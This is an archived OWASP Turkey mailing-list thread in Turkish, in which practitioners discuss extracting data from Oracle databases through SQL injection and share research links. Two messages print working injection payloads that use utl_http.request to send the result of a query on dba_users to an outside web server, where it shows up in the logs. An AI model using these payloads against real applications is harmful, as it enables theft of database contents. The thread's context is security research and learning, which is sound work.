[Owasp-turkey] Data Mining with SQL Injection

Bedirhan Urgun urgunb at hotmail.com
Thu Sep 13 09:40:13 EDT 2007


 
 Anladigim kadari ile oracle'a has "error based sql injection" ile alakali cok bisey gorunmuyor. Ama tam anlamiyla error-based olmasa da "inference" isine yariyor gibi.
 
 Ufak bi not: UTL_HTTP.REQUEST aslinda select icinde kullanilabiliyor olmali. 1-2 ay once boyle bi sql enjeksiyonu ile karsilasmistim;
 
  zzz') union select utl_http.request('www.google.com.tr'),'1','1','1',1,'1' from dual --
 
 yukaridaki string, degerlendirdigim uygulamada calisti. subquery'lerle denemek lazim. Tabi gerekli sart olarak, yukaridaki string'de union meselesi bi veri donmese bile calismali...
 
 mesela;
 
 zzz') union select utl_http.request('http://www.google.com.tr/a.jsp' || (select username from dba_users) ),'1','1','1',1,'1' from dual --
 
 bedirhan


Date: Thu, 13 Sep 2007 14:38:58 +0200From: denizcev at gmail.comTo: urgunb at hotmail.comSubject: Re: [Owasp-turkey] Data Mining with SQL InjectionCC: owasp-turkey at lists.owasp.orgAslında dün araştırma yaparken bazı kaynaklar buldum ve oracle jdbc ile bağlanan bir sistem üzerinde test etme imkanımda oldu.İlk önce üstadın sitesinden başlayalım - http://ferruh.mavituna.com/makale/sql-injection-union-ile-data-okuma/http://www.databasesecurity.com/webapps/sqlinference.pdfhttp://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-litchfield.pdfYukarıdaki iki link ise daha çok blind sql injection'da data mining ile ilgili bilgiler içeriyor ancak oldukça faydalıout-of-band data mining için ise aşağıdaki linklerde güzel bilgiler var. http://www.hideaway.net/2007/08/out-of-band-oracle-sql-injection-with.htmlhttp://video.google.com/videoplay?docid=3470216843068111954&hl=enhttp://www.inspectit.se/dc15/Defcon_15_Presentation_Web.pdfOOB data-minin için eğer Oracle DB kullanılıyor ise select utl_http.request('http://site/'|| (select username from dba_users)) from dual--gibi bir ifade enjecte edilebilirse site nin web server loglarında sql'in sonucunu görmek mümkün olabiliyormuş. Ancak bu sql'i kullanabilmek için önceki sql syntax'ini iptal etmek gerekecek. Ancak jdbc de malesef ; karakteriişe yaramadığı için bunu test edemedim.Herkese İyi Çalışmalar
On 9/13/07, Bedirhan Urgun <urgunb at hotmail.com> wrote:

  Merhaba, Oracle'da sql injection, sunucuda dusuk hakli kullanici elde edilmesinden veya uygulamadan cagrilan problemli anonymous PL/SQL bloklarinin bulunmasindan sonra yapilacak seylere yogunlasildigindan bu tur calismalar eksik kalmis galiba. Ya da herkes mssql'e yuklenmis...   Gerci calisma yapilacak kadar Oracle'a ozel bilgi (digerlerinde bulunan sql enjeksiyonu hata mesajlari Oracle icin de ayni; mesela sutun sayisinin veya tiplerinin bulunmasi) cikar mi onu da bilmiyorum.   Data mining ile pek alakasi yok ama oraDB kodlarinin aranabilecegi bi firefox extension'i belki bilmeyenlere faydali olabilir;  https://addons.mozilla.org/en-US/firefox/addon/1314 Eger arastirmalariniz sonucu bisey cikarsa duymak isterim.  bedirhan


Date: Wed, 12 Sep 2007 14:55:21 +0200From: denizcev at gmail.comTo: owasp-turkey at lists.owasp.orgSubject: [Owasp-turkey] Data Mining with SQL Injection
Selamlar,
 Özellikle oracle'a yönelik web üzerinden error based sql injection'larda data mining nasıl yapıldığı konusunda elinde detaylı bilgi bulunan arkadaş var mı? 
 İyi Çalışmalar.

Gear up for Halo® 3 and get a $25 Best Buy gift card. It's our way of saying thanks for using Windows Live™. Get it now!
_________________________________________________________________
Capture your memories in an online journal!
http://www.reallivemoms.com?ocid=TXT_TAGHM&loc=us
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20070913/3b9096c9/attachment.html 


More information about the Owasp-turkey mailing list